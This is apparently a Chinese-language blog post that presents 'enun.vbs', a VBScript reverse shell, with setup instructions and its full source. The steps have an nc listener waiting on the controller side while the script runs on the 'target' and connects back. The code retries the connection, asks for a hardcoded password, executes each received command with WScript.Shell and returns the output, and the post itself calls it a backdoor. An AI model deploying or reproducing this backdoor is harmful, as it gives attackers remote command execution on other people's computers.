VBScript 打造自己的远程CMDShell附使用教程
使用方法:
1,控制:nc.exe,执行:nc -l -v -p 1234;
2,目标:cscript.exe enun.vbs ip port;
3,密码:enun。
几点说明:
1,退出 shell,请输入 “exit”,不要用 “ctrl + c”,这样的话只能等目标重启或手动运行后门才能连接;
2,windows 7 等环境下普通标准用户也能使用,但是获取的权限相对有限。
3,内部命令及管道使用如下图:
相关下载:
1,视频演示
2,
enun.vbs 源码:
'--------------------------------------------------------------------------
' copyright (c) lxzzr. all rights reserved.
' scriptname: enun.vbs
' creation date: 28/8/2012
' last modified: 28/8/2012
' author: lxzzr, www.enun.net
' e-mail: lxzzr@21cn.com
' usage: cscript.exe //nologo enun.vbs ip port
'--------------------------------------------------------------------------
on error resume next
public socketobj, execobj, shellobj
remotehost = wscript.arguments(0)
remoteport = wscript.arguments(1)
do
do while (socketobj.state <> 7)
wscript.echo "try connect to " & remotehost & ":" & remoteport & " ..."
set socketobj = wscript.createobject("mswinsock.winsock")
socketobj.protocol = 0
socketobj.remotehost = remotehost
socketobj.remoteport = remoteport
socketobj.connect
wscript.sleep 3000
loop
wscript.echo "connected to server."
socketobj.senddata socketobj.localhostname & " is connected, enter password: "
do while (socketobj.bytesreceived = 0)
wscript.sleep 10
loop
'密码验证
socketobj.getdata authkey, vbstring
if split(authkey, chr(10), -1, 1)(0) = "enun" then
set shellobj = createobject("wscript.shell")
srevdata = " "
socketobj.senddata "logon success, welcome!" & chr(13) & chr(10)
'循环等待执行命令
do
set execobj = shellobj.exec(split(srevdata, chr(10), -1, 1)(0))
socketobj.senddata execobj.stdout.readall
socketobj.senddata execobj.stderr.readall
if srevdata <> "" then
socketobj.senddata chr(10) & "[" & socketobj.localhostname & "@" & "enun]#: "
end if
if left(srevdata, 4) = "exit" then
socketobj.close
exit do
end if
socketobj.getdata srevdata, vbstring
wscript.sleep 1000
loop
else
lockoutbadcount = lockoutbadcount + 1
socketobj.senddata "logon failure: unknown user name or bad password." & chr(13) & chr(10)
wscript.sleep 1000
end if
'账户策略
if (lockoutbadcount > 3) then
socketobj.senddata "the user account is locked!" & chr(13) & chr(10)
wscript.sleep 1000
socketobj.close
lockoutbadcount = 0
wscript.sleep 600*1000
end if
loop